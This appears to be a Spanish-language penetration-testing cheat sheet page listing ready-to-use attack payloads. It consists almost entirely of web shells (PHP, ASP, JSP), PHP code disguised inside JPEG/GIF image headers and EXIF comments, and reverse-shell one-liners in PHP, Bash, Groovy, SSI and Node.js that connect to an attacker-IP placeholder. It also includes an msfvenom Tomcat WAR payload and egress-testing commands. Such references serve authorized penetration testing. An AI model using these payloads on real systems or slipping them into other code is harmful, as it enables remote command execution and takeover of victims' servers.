General

Web shells

Kali Linux

/usr/share/webshells/

PHP

<?php system($_REQUEST['cmd']); ?>
<?php echo system($_GET["cmd"]); ?>
<?php
    if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
?>

ASP

<% eval request("cmd") %>

JSP

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Imágenes

echo -n "\xff\xd8\xff\xe0<?php system('id'); ?>" > webshell.jpg
echo -n "GIF89a;<?php system('id'); ?>" > webshell.gif
exiftool -Comment="<?php system('id'); ?>" webshell.gif

Reverse shells

PHP

# /bin/sh
php -r '$sock=fsockopen("<attacker-IP-address>",<listen-port>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<attacker-IP-address>",<listen-port>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<attacker-IP-address>",<listen-port>);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<attacker-IP-address>",<listen-port>);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<attacker-IP-address>",<listen-port>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# /bin/bash
php -r "exec(\"bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'\");"
php -r "shell_exec(\"bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'\");"
php -r "system(\"bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'\");"
php -r "passthru(\"bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'\");"
php -r "popen(\"bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'\",\"r\");"

Apache Tomcat

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f war -o revshell.war

Groovy

String host="<attacker-IP-address>";
int port=<listen-port>;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Server-Side Includes (SSI)

<!--#exec cmd="mkfifo /tmp/reverse-shell;nc <attacker-IP-address> <listen-port> 0</tmp/reverse-shell|/bin/bash 1>/tmp/reverse-shell;rm /tmp/reverse-shell" -->

Node.js

# /bin/sh
echo "require('child_process').exec('nc -nv <attacker-IP-address> <listen-port> -e /bin/sh')" > /tmp/revshell.js; node /tmp/revshell.js
# /bin/bash
echo "require('child_process').exec('nc -nv <attacker-IP-address> <listen-port> -e /bin/bash')" > /tmp/revshell.js; node /tmp/revshell.js
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(<listen-port>, "<attacker-IP-address>", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /test/;
})();

Revisión de ejecución de comandos

# Máquina victima
## Linux/Unix
ping -c 4 <attacker-IP-address>
## Windows
ping -n 4 <attacker-IP-address>

# Máquina atacante
sudo tcpdump -i <network-interface> icmp

Revisión de puertos de salida abiertos

# Wget
wget <attacker-IP-address>:443
python3 -m http.server 443

# cURL
curl http://<attacker-IP-address>:443
python3 -m http.server 443

# Bash
bash -c 'echo testing > /dev/tcp/<attacker-IP-address>/443'
rlwrap nc -lvnp 443
AnteriorShellsSiguienteMSFvenom

Última actualización